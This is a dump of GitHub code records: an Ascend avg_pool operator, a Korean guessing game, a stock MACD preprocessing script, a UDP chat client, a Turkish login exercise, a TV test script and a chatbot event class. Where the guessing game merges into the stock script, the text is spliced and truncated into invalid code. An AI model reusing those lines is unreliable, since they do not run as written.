print('请重新输入!')","repo_name":"slxxtanke/lyric_auto_generator","sub_path":"get_lyric.py","file_name":"get_lyric.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643197346","text":"import te.lang.cce\nfrom te import tvm\nfrom te.utils.op_utils import *\nfrom topi import generic\nfrom te.platform.cce_policy import get_L1_info\nfrom te.utils.error_manager import error_manager_util as err_mana\n\n\ndef get_fusion_params(input_data, output_data, is_fused_compute=True):\n \"\"\"\n :param input_data: tensor of input_data\n :param output_data: dict of output_data\n :return: dict fusion_params\n \"\"\"\n # l1 fusion params assign\n # 0: L1 depth fusion, 1: L1 width fusion, -1: no L1 fusion\n l1_fusion_type = input_data.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in input_data.op.attrs else -1\n in_l1_flag = input_data.op.attrs[\"addr_type\"].value == 1 \\\n if \"addr_type\" in input_data.op.attrs else False\n in_valid_shape = input_data.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in input_data.op.attrs else []\n in_slice_offset = input_data.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in input_data.op.attrs else []\n in_select_read_flag = bool(in_valid_shape)\n in_split_index = input_data.op.attrs[\"split_index\"].value \\\n if \"split_index\" in input_data.op.attrs else 0\n out_l1_flag = output_data.get(\"addr_type\") == 1\n fusion_params = {\"is_fused_compute\": is_fused_compute,\n \"l1_fusion_type\": l1_fusion_type,\n \"in_l1_flag\": in_l1_flag,\n \"out_l1_flag\": out_l1_flag,\n \"in_select_read_flag\": in_select_read_flag,\n \"in_split_index\": in_split_index,\n \"in_slice_offset\": in_slice_offset}\n\n return fusion_params\n\n\ndef shape_to_list(shape):\n \"\"\"\n translate tvm.shape to list type in python\n \"\"\"\n if isinstance(shape, (list, tuple)):\n return shape\n tmp = []\n if shape == \"\":\n return ()\n for i in shape:\n tmp.append(i.value)\n return tmp\n\n\ndef avgpool_conv2d_fusion_para(inputs, outputs):\n \"\"\"\n get L1 fusion para for depthwise_conv2d\n \"\"\"\n input_memory_type = inputs.op.attrs[\"addr_type\"] \\\n if \"addr_type\" in inputs.op.attrs else 0\n output_memory_type = outputs[\"addr_type\"] \\\n if \"addr_type\" in outputs else 0\n valid_shape = inputs.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in inputs.op.attrs else ()\n slice_offset = inputs.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in inputs.op.attrs else ()\n l1_fusion_type = inputs.op.attrs[\"L1_fusion_type\"] \\\n if \"L1_fusion_type\" in inputs.op.attrs else -1\n\n fmap_l1_addr_flag = inputs.op.attrs[\"L1_addr_flag\"] \\\n if \"L1_addr_flag\" in inputs.op.attrs else -1\n fmap_l1_valid_size = inputs.op.attrs[\"L1_valid_size\"] \\\n if \"L1_valid_size\" in inputs.op.attrs else -1\n\n l1_fusion_enable_flag = get_L1_info(\"L1_fusion_enabled\")\n if not l1_fusion_enable_flag:\n l1_fusion_type = -1\n\n valid_shape = shape_to_list(valid_shape)\n slice_offset = shape_to_list(slice_offset)\n\n if not l1_fusion_enable_flag:\n input_memory_type = 0\n output_memory_type = 0\n valid_shape = []\n slice_offset = []\n l1_fusion_type = -1\n\n if int(input_memory_type) not in (0, 1, 2):\n err_man.raise_err_input_mem_type(\"depthwise_conv2d\",\n input_memory_type)\n if int(output_memory_type) not in (0, 1, 2):\n err_man.raise_err_output_mem_type(\"depthwise_conv2d\",\n output_memory_type)\n if valid_shape and not slice_offset:\n err_man.raise_err_specific_user(\n \"depthwise_conv2d\",\n \"if valid_shape exists slice_offset can not be []\")\n\n fusion_para = {\"input_memory_type\": input_memory_type,\n \"output_memory_type\": output_memory_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"l1_fusion_type\": l1_fusion_type,\n \"fmap_l1_addr_flag\": fmap_l1_addr_flag,\n \"fmap_l1_valid_size\": fmap_l1_valid_size}\n\n return fusion_para\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-statements\n# pylint: disable=locally-disabled,unused-argument,invalid-name,too-many-locals\ndef check_window_rule(ksize, strides, data_format):\n \"\"\"\n check ksize and strides of window in pooling\n \"\"\"\n if data_format in (\"NHWC\",):\n if len(ksize) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'ksize'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(ksize)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n\n elif ksize[0] != 1 or ksize[3] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"ksize[1]\", \"ksize[3]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((ksize[1], ksize[3]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s], \"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n if len(strides) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'strides'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(strides)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif strides[0] != 1 or strides[3] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"strides[1]\", \"strodes[3]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((strides[1], strides[3]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n elif data_format in (\"NC1HWC0\", \"NCHW\"):\n if len(ksize) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'ksize'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(ksize)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif ksize[0] != 1 or ksize[1] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"ksize[0]\", \"ksize[1]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((ksize[0], ksize[1]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n if len(strides) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'strides'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(strides)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s], but\"\n \"actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif strides[0] != 1 or strides[1] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"strides[0]\", \"strodes[1]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((strides[1], strides[1]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n else:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_015\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'x'\n errorInfo['excepted_format_list'] = \",\".join((\"NC1HWC0\",\n \"NCHW\", \"NHWC\"))\n errorInfo['format'] = data_format\n raise RuntimeError(errorInfo, \"In op[%s], the format[%s] of input\"\n \"should be one of [%s],\"\n \"but actually is [%s].\"\n % (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['excepted_format_list'],\n errorInfo['format']))\n\n\ndef get_corrected_pad(input_pad):\n \"\"\"\n algorithm:\n get corrected pad value\n\n Parameters\n ----------\n input_pad: the value of pad\n Returns\n -------\n output_pad: the value of pad\n \"\"\"\n if input_pad < 0:\n output_pad = 0\n else:\n output_pad = input_pad\n return output_pad\n\n\ndef avg_pool_check_rule(input_shape, input_dtype,\n output_dtype, input_format, ksize, strides,\n data_format, kernel_name):\n \"\"\"\n :param input_shape: shape of input_data\n :param input_dtype: dtype of input_data\n :param output_dtype: dtype of output_data\n :param ksize: the window of avgpooling\n :param strides: the stride of avgpooling window\n :param data_format: NHWC default\n :param kernel_name: cce kernel name\n :return: None\n\n \"\"\"\n # check input and output\n check_shape(input_shape)\n check_dtype(input_dtype, [\"float16\", \"int8\"])\n check_dtype(output_dtype, [\"float16\", \"int8\", \"int32\"])\n\n check_window_rule(ksize, strides, data_format)\n\n\ndef avg_pool_compute1(x, y, ksize, strides,\n padding=\"VALID\", data_format=\"NHWC\",\n is_fused_compute=True,\n kernel_name=\"avg_pool\"):\n \"\"\"\n describe compute\n return: tensor\n \"\"\"\n # create window and stride for pooling2d\n if data_format in (\"NHWC\",):\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n window = list(window)\n stride = list(stride)\n\n # l1 fusion and l2 fusion\n l1_fusion_type = x.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in x.op.attrs else -1\n fusion_params = get_fusion_params(x, y, is_fused_compute)\n in_select_read_flag = fusion_params.get(\"in_select_read_flag\")\n in_valid_shape = fusion_params.get(\"in_valid_shape\")\n in_slice_offset = fusion_params.get(\"in_slice_offset\")\n\n if in_select_read_flag:\n select_tensor_in = tvm.compute(in_valid_shape,\n lambda n, c1, h, w, c0:\n x(n, c1, h + in_slice_offset[2], w, c0),\n name=\"tensor_read_select\",\n attrs=x.op.attrs)\n res = te.lang.cce.pooling2d(select_tensor_in, window, stride, \"AVG\",\n padding, fusion_params=fusion_params)\n elif l1_fusion_type == 1:\n x.op.attrs[\"addr_type\"].value = 1\n in_l1_flag = True\n fusion_params[\"in_l1_flag\"] = in_l1_flag\n\n l1_width_fusion_in = tvm.compute(x.shape,\n lambda n, c1, h, w, c0:\n x(n, c1, h, w, c0),\n name=\"l1_width_fusion_tensor_in\",\n attrs=x.op.attrs)\n res = te.lang.cce.pooling2d(l1_width_fusion_in, window, stride,\n \"AVG\", padding,\n fusion_params=fusion_params)\n else:\n res = te.lang.cce.pooling2d(x, window, stride, \"AVG\", padding,\n fusion_params=fusion_params)\n\n return res\n\n\n# pylint: disable=unnecessary-lambda,redefined-builtin,too-many-locals\n# pylint: disable=unnecessary-lambda,too-many-statements\n@fusion_manager.register(\"avg_pool\")\ndef avg_pool_compute(x, filter, bias, y, ksize, strides, padding=\"VALID\",\n data_format=\"NHWC\", offset_x=0, kernel_name=\"avg_pool\"):\n \"\"\"\n algorithm: avg_pool\n calculating the average pooling\n\n Parameters\n ----------\n x : dict, shape and dtype of input_data, only support float16\n filter : dict, shape and dtype of input_data, only support float16\n y : dict, shape and dtype of output_data, only support float16\n ksize : list or tuple, the window of avgpooling, only support avgpooling\n in H or W\n strides : list or tuple, the stride of avgpooling window, only support\n avgpooling in H or W\n padding : str, the mode of padding, support padding and not padding\n data_format : str, default = \"NHWC\"\n kernel_name : kernel name, default value is \"avg_pool\"\n\n Returns\n -------\n None\n \"\"\"\n out_dtype = y.get(\"dtype\")\n # create window and stride for pooling2d\n if data_format in (\"NHWC\",):\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n shape_x = x.shape\n input_h = shape_x[2]\n input_w = shape_x[3]\n dilations = (1, 1)\n\n dsl_flag = True\n\n if padding == \"SAME\":\n output_h = (input_h + stride[0] - 1) // stride[0]\n output_w = (input_w + stride[1] - 1) // stride[1]\n pad_row = (output_h - 1) * stride[0] + \\\n ((window[0] - 1) * dilations[0] + 1) - input_h\n pad_col = (output_w - 1) * stride[1] + \\\n ((window[1] - 1) * dilations[1] + 1) - input_w\n pad_top = pad_row // 2\n pad_bottom = pad_row - pad_top\n pad_left = pad_col // 2\n pad_right = pad_col - pad_left\n pad_top = get_corrected_pad(int(pad_top))\n pad_bottom = get_corrected_pad(int(pad_bottom))\n pad_left = get_corrected_pad(int(pad_left))\n pad_right = get_corrected_pad(int(pad_right))\n pad = (pad_top, pad_bottom, pad_left, pad_right)\n else:\n pad = (0, 0, 0, 0)\n if int(input_h) == int(window[0]) and int(input_h) == int(window[1]):\n res = avg_pool_compute1(x, y, ksize, strides, padding, data_format,\n is_fused_compute=True, kernel_name=kernel_name)\n else:\n l1_fusion_para = avgpool_conv2d_fusion_para(x, y)\n res = te.lang.cce.te_compute.depthwise_conv2d_compute(\n x, filter, out_dtype.lower(), stride, pad, dilations, {\n \"bias_tensor\": bias, \"dsl_flag\": dsl_flag,\n \"offset_x\": offset_x}, l1_fusion_para, kernel_name)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, OPTION_INPUT, OPTION_INPUT, REQUIRED_OUTPUT,\n REQUIRED_ATTR_LIST_INT, REQUIRED_ATTR_LIST_INT,\n REQUIRED_ATTR_STR, OPTION_ATTR_STR, OPTION_ATTR_INT,\n KERNEL_NAME)\ndef avg_pool(x, filter, bias, y, ksize, strides,\n padding=\"VALID\", data_format=\"NHWC\", offset_x=0,\n kernel_name=\"avg_pool\"):\n \"\"\"\n Parameters\n ----------\n x : dict, shape and dtype of input_data, only support float16, shape is 4\n dims, format is NCHW\n\n y : dict, shape and dtype of output_data, only support float16\n\n ksize : list or tuple, the window of avgpooling, only support avgpooling\n in H or W\n\n strides : list or tuple, the stride of avgpooling window, only support\n avgpooling in H or W\n\n padding : str, the mode of padding, support padding and not padding\n\n data_format : str, default = \"NHWC\"\n\n kernel_name : cce kernel name, default value is \"avg_pool_cce\"\n\n Returns\n -------\n None\n \"\"\"\n # get shape&dtype\n input_shape = x.get(\"shape\")\n input_dtype = x.get(\"dtype\")\n input_dtype = input_dtype.lower()\n output_dtype = y.get(\"dtype\")\n output_dtype = output_dtype.lower()\n input_format = x.get(\"format\")\n\n # check others parameter\n avg_pool_check_rule(input_shape, input_dtype,\n output_dtype, input_format, ksize, strides,\n data_format, kernel_name)\n\n # set tensor attrs, during L1 fusion these attrs will assign by te_fusion\n addr_type = x.get(\"addr_type\", 0)\n valid_shape = x.get(\"valid_shape\", [])\n slice_offset = x.get(\"slice_offset\", [])\n split_index = x.get(\"split_index\", 0)\n l1_fusion_type = x.get(\"L1_fusion_type\", -1)\n attr = {\"addr_type\": addr_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"split_index\": split_index,\n \"L1_fusion_type\": l1_fusion_type}\n is_l1fusion = l1_fusion_type in (0, 1)\n\n if data_format in (\"NHWC\",):\n ksizeH = ksize[1]\n ksizeW = ksize[2]\n hw = ksizeH * ksizeW\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n ksizeH = ksize[2]\n ksizeW = ksize[3]\n hw = ksizeH * ksizeW\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n\n # compute\n # create tensor_in\n tensor_in = tvm.placeholder(input_shape, name=\"tensor_in\",\n dtype=input_dtype, attrs=attr)\n\n if filter is not None:\n filter_shape = filter.get(\"shape\")\n filter_dtype = filter.get(\"dtype\").lower()\n filter_c1 = filter_shape[0] / hw\n if filter_dtype in(\"float16\", \"float32\"):\n filter_shape_5d = filter_c1, ksizeH, ksizeW, filter_shape[2], \\\n filter_shape[3]\n else:\n\n filter_shape_5d = filter_shape[0], ksizeH, ksizeW, 32, \\\n 32\n filter_in = tvm.placeholder(filter_shape_5d, name=\"filter_in\",\n dtype=filter_dtype, attrs=attr)\n bias_tensor = None\n if bias is not None and bias != {}:\n bias_shape = bias.get(\"shape\")\n bias_tensor = tvm.placeholder(bias_shape,\n name='bias_tensor',\n dtype=output_dtype.lower())\n\n out_dtype = y.get(\"dtype\")\n\n shape_x = input_shape\n input_h = shape_x[2]\n input_w = shape_x[3]\n dilations = (1, 1)\n dsl_flag = False\n\n if padding == \"SAME\":\n output_h = (input_h + stride[0] - 1) // stride[0]\n output_w = (input_w + stride[1] - 1) // stride[1]\n pad_row = (output_h - 1) * stride[0] + \\\n ((window[0] - 1) * dilations[0] + 1) - input_h\n pad_col = (output_w - 1) * stride[1] + \\\n ((window[1] - 1) * dilations[1] + 1) - input_w\n pad_top = pad_row // 2\n pad_bottom = pad_row - pad_top\n pad_left = pad_col // 2\n pad_right = pad_col - pad_left\n pad_top = get_corrected_pad(int(pad_top))\n pad_bottom = get_corrected_pad(int(pad_bottom))\n pad_left = get_corrected_pad(int(pad_left))\n pad_right = get_corrected_pad(int(pad_right))\n pad = (pad_top, pad_bottom, pad_left, pad_right)\n else:\n pad = (0, 0, 0, 0)\n res = te.lang.cce.te_compute.depthwise_conv2d_compute(\n tensor_in, filter_in, out_dtype.lower(), stride, pad, dilations, {\n \"bias_tensor\": bias_tensor, \"dsl_flag\": dsl_flag,\n \"offset_x\": offset_x}, None, kernel_name)\n\n\n tensor_list = [tensor_in, filter_in, res]\n if bias_tensor is not None:\n tensor_list = [tensor_in, filter_in, bias_tensor, res]\n else:\n res = avg_pool_compute1(tensor_in, y, ksize, strides, padding,\n data_format, False, kernel_name)\n\n tensor_list = [tensor_in, res]\n # schedule\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n # build\n config = {\"print_ir\": False,\n \"need_build\": False,\n \"name\": kernel_name,\n \"tensor_list\": tensor_list,\n \"l1_fusion_option\": is_l1fusion}\n\n te.lang.cce.cce_build_code(sch, config)\n\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/avg_pool.py","file_name":"avg_pool.py","file_ext":"py","file_size_in_byte":22718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16152474811","text":"import random\r\n\r\nn=random.randint(1,100)\r\n#print(f'n:{n}')\r\n\r\nwhile True:\r\n u=int(input('1~100사이의 수:'))\r\n\r\n a=abs(u-n)\r\n\r\n m=''\r\n if a>=20:\r\n m='너무'\r\n\r\n if u>n:\r\n print(f'{m}크다')\r\n elif u=0, df['변화량'], 0)\ndf['하락폭'] = np.where(df['변화량'] <0, df['변화량'].abs(), 0)\n\n# MACD & MACD oscillator\nmacd_short, macd_long, macd_signal=12, 26, 9 #기본값\ndf[\"MACD_short\"] = df[\"Close\"].ewm(span = macd_short).mean()\ndf[\"MACD_long\"] = df[\"Close\"].ewm(span = macd_long).mean()\ndf[\"MACD\"] = df.apply(lambda x: (x[\"MACD_short\"] - x[\"MACD_long\"]), axis = 1)\ndf[\"MACD_signal\"] = df[\"MACD\"].ewm(span = macd_signal).mean() \ndf[\"MACD_oscillator\"] = df.apply(lambda x:(x[\"MACD\"] - x[\"MACD_signal\"]), axis = 1)\n\n# welles moving average\n# df['AU'] = df['상승폭'].ewm(alpha = 1/14, min_periods = 14).mean()\n# df['AD'] = df['하락폭'].ewm(alpha = 1/14, min_periods = 14).mean()\n# df['RSI'] = df['AU'] / (df['AU'] + df['AD']) * 100\n\n# 매수/매도 by MACD(0 돌파 시 매수/매도)\ndf[\"MACD_sign\"] = df.apply(lambda x: (\"매수\" if x[\"MACD\"]x[\"MACD_signal\"] else \"매도\"), axis=1)\n\n# 매수/매도 by RSI 30 70 (30 전환 시 매수, 70 전환 시 매도)\n#df[\"RSI_sign\"] = df.apply(lambda x: (\"매수\" if x[\"RSI\"]<50 else \"매도\"), axis=1)\n\ndf = df.sort_index(axis=1)\n\nfor x in strategy:\n if x=='RSI':\n k = df[['Close', 'RSI', 'RSI_sign']]\n elif x=='MACD':\n k = df[['Close', 'MACD', \"MACD_sign\"]]\n # else :\n # k = df[['Close', 'MACD_oscillator', \"MACD_oscillator_sign\"]]\n\n k = k.dropna()\n k.to_csv(f\"C:/Users/SLOWLAB/.conda/anomaly_transformer_in_stock_market/data/{x}.csv\")","repo_name":"jaeho23/anomaly_transformer_in_stock_market","sub_path":"samsungelectronic/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19154444974","text":"import socket\r\nimport threading\r\n\r\n\r\nclass Classe_Thread(threading.Thread):\r\n def __init__(self): \r\n threading.Thread.__init__(self)\r\n self.running = True \r\n\r\n def run(self):\r\n while self.running:\r\n data, indirizzo = s.recvfrom(4096) #ricevo i messaggi che mi inviano\r\n print(data.decode())\r\n\r\n\r\ndef main():\r\n global s\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\n nick= input(\"Inserisci il tuo nickname: \")\r\n s.sendto((f\"nickname:{nick}\").encode(), (\"192.168.0.126\", 5000)) #invia il nick al server\r\n\r\n messaggio, indirizzo= s.recvfrom(4096) #stampo l'ok di avvenute connessione\r\n print(messaggio.decode())\r\n\r\n client = Classe_Thread()\r\n client.start()\r\n\r\n if messaggio.decode()==\"ok\": #se ricevo l'ok la chat è attiva e si possono inviare i messaggi\r\n print(\"chat mode\")\r\n while True:\r\n #invio i messaggi a un mio compagno inserendo il suo nick\r\n messaggio = input()\r\n s.sendto((f\"{nick}:{messaggio}\").encode(), (\"192.168.0.126\", 5000))\r\n \r\n\r\n\r\nmain()","repo_name":"MarcoBertoglio/TPSIT-5-AROB","sub_path":"clientUDP_thread.py","file_name":"clientUDP_thread.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6992933348","text":" #Python'da veri tipleri\n\n#Metin tipi veriler = str, Metinsel veri saklamak için kullanılır\n#Numerik (sayısal) tip veriler: \n #int = integer tam sayı tutmak için \n #float ondalık sayı tutmak için \n #complex karmaşık sayılar tutmak için kullanılır\n#Sequence(sıralama) tipi veriler : \n #list = birden fazla öğeyi tutmak(liste haline getirmek) için kullanılır\n #tuple = List'ten farkı, değiştirelemez ve ilk tanımlandığı şeklinde kalır \n #range = for döngüsünde kullanılır ve bir aralık tanımlar. Örneğin == for i in range(0,11): print (i), 0'dan 11 e kadar anlamına gelir\n#Mapping (adresleme) tipi veriler : dict == Sıralanamaz ama değiştirelebilir ve anahtar ile çağırılabilir. Anahtar:değer şeklinde tanımlanır.\n#Set tipi veriler :\n #set == Pythonda set listeleri, list' e benzer ancak fark olarak set içindeki elemanlar sıralanamaz ve indekslenemez. Yani set'e eklenen bir elemanın hangi sırada olduğunu bilemeyiz.\n #frozenset == Set ile aynıdır ancak değiştirilemez. Bu yüzden kısıtlanmış küme de denir.\n#boolean tip veriler : bool == True-False değerlerini tutmak için kullanılır. \n#binary tip veriler = bytes,bytearray,memoryview\n\n #Kodlama.io da kullanılan değişkenler\n#Mail adresi ve kullanıcı şifresi : bool\n#Ders ilerleme yüzdesi : float\n#Kategori,eğitmenler : list\n#Kurs isimleri : string\n\nuser_mail =\"tunahanyzc@gmail.com\"\nuser_pword = 12345\nget_mail= input (\"Lütfen mail adresinizi giriniz: \")\nget_user_pword= int (input (\"Lütfen şifrenizi giriniz: \"))\nif (get_mail == user_mail):\n if (get_user_pword == user_pword):\n print('Giriş başarılı.Hoşgeldiniz.')\n else:\n print('Hatalı veya eksik şifre girdiniz.')\nelse:\n print('Kullanıcı bulunamadı')\n\n","repo_name":"tunayzc/Python","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9009642488","text":"# Import Tkinter for GUI\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nimport time\nimport datetime\nimport threading\n# Import the ADB_Action_Script.py it must be on the same folder\nfrom daaf.ADB_Action_Scipt import ActionScript\n# Import the RC keys and App PKGs for easy scripting\nfrom daaf.RC_Code import SonyRCKey\nfrom daaf.AppList import AppList\nimport daaf.Power_Tools as pt\nfrom daaf.atvAuto import atvAuto\n\n\nclass Demo(atvAuto):\n\n def __init__(self, tkRoot):\n \"\"\" Initialize the UI and then Set Title Header\"\"\"\n super().__init__(tkRoot, \"Power OFF PSVue\") # Update the string\n\n # this is in minutes\n self.playback_time = 0.1\n\n def testCaseInfo(self):\n \"\"\" \n Set the test case info\n This is the one that shows on the left side of the screen\n \"\"\"\n self.makeInstructionLabel(\"Tune to HDMI1\")\n self.makeInstructionLabel(\"Playback HDMI1 for 1 hour\")\n self.makeInstructionLabel(\"Do Channel Change every 10 minutes\")\n\n self.makeInstructionLabel(\"Launch Netflix\")\n self.makeInstructionLabel(\"Playback Netflix content for 1 hour\")\n\n self.makeInstructionLabel(\"Launch Amazon\")\n self.makeInstructionLabel(\"Playback Amazon content for 1 hour\")\n\n self.makeInstructionLabel(\"Launch PS Vue\")\n self.makeInstructionLabel(\"Playback PS Vue content for 1 hour\")\n\n self.makeInstructionLabel(\"RC OFF TV\")\n\n def runThis(self):\n \"\"\" Below is where you assemble test cases\"\"\"\n\n # launch HDMI input\n self.press_home()\n self.wait_second(5)\n self.launch_hdmi_input(\"HDMI1\")\n\n # Do Channel Up every 10 minutes for 1 hour\n for i in range(1, 4):\n print(f'loop count {i}')\n self.channel_up()\n self.wait_minute(10)\n\n # Do Channel Down every 10 minutes for 1 hour\n for i in range(1, 4):\n print(f'loop count {i}')\n self.channel_down()\n self.wait_minute(10)\n\n # Launch and Playback Netflix\n self.launch_netflix()\n self.select_netflix_content()\n self.playback_netflix(self.playback_time)\n\n # Launch and playback Amazon\n self.launch_amazon()\n self.select_amazon_content()\n self.playback_amazon(self.playback_time)\n\n # Launch and Playback PSVue\n self.launch_psvue()\n self.select_psvue_content()\n self.playback_psvue(self.playback_time)\n\n # RC OFF the TV\n self.press_rc_key(\"POWER\")\n\n\n\n# Start the script\nroot = Tk()\nDemo(root).startApp()\n","repo_name":"DarrenVictoriano/atvAuto","sub_path":"power_off_psvue.py","file_name":"power_off_psvue.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"925237537","text":"import asyncio\nfrom functools import partial\nfrom typing import Any, Callable, Coroutine, Dict, List, Optional, TypeVar\n\nfrom nonebot import get_app, get_asgi, get_bots, get_driver\nfrom nonebot.adapters.cqhttp import Bot as CQBot\nfrom nonebot.adapters.cqhttp.event import Event as NoneBotEvent\nfrom nonebot.adapters.cqhttp.event import MessageEvent\nfrom nonebot.adapters.cqhttp.message import Message as NoneBotMessage\nfrom nonebot.exception import ApiNotAvailable\nfrom nonebot.matcher import Matcher\nfrom singledispatchmethod import singledispatchmethod\n\nfrom nonetrip.typing import Message_T\n\nfrom .message import Message, MessageSegment\n\n_AsyncCallable_T = TypeVar(\"_AsyncCallable_T\", bound=Callable[..., Coroutine])\n_HandlerDecorator = Callable[[_AsyncCallable_T], _AsyncCallable_T]\n_NoneBotHandler = Callable[[CQBot, NoneBotEvent], Coroutine]\n\n\nclass Event(dict):\n \"\"\"\n 封装从 CQHTTP 收到的事件��据对象(字典),提供属性以获取其中的字段。\n 除 `type` 和 `detail_type` 属性对于任何事件都有效外,其它属性存在与否(不存在则返回\n `None`)依事件不同而不同。\n \"\"\"\n\n @classmethod\n def from_payload(cls, payload: NoneBotEvent) -> \"Event\":\n \"\"\"\n 从 CQHTTP 事件数据构造 `Event` 对象。\n \"\"\"\n payload_dict = payload.dict()\n if isinstance(payload, MessageEvent):\n payload_dict[\"message\"] = Message([\n MessageSegment(type_=segment.type, data=segment.data)\n for segment in payload.message\n ])\n return cls(payload_dict)\n\n @property\n def type(self) -> str:\n \"\"\"\n 事件类型,有 ``message``、``notice``、``request``、``meta_event`` 等。\n \"\"\"\n return self[\"post_type\"]\n\n @property\n def detail_type(self) -> str:\n \"\"\"\n 事件具体类型,依 `type` 的不同而不同,以 ``message`` 类型为例,有\n ``private``、``group``、``discuss`` 等。\n \"\"\"\n return self[f\"{self.type}_type\"]\n\n @property\n def sub_type(self) -> Optional[str]:\n \"\"\"\n 事件子类型,依 `detail_type` 不同而不同,以 ``message.private`` 为例,有\n 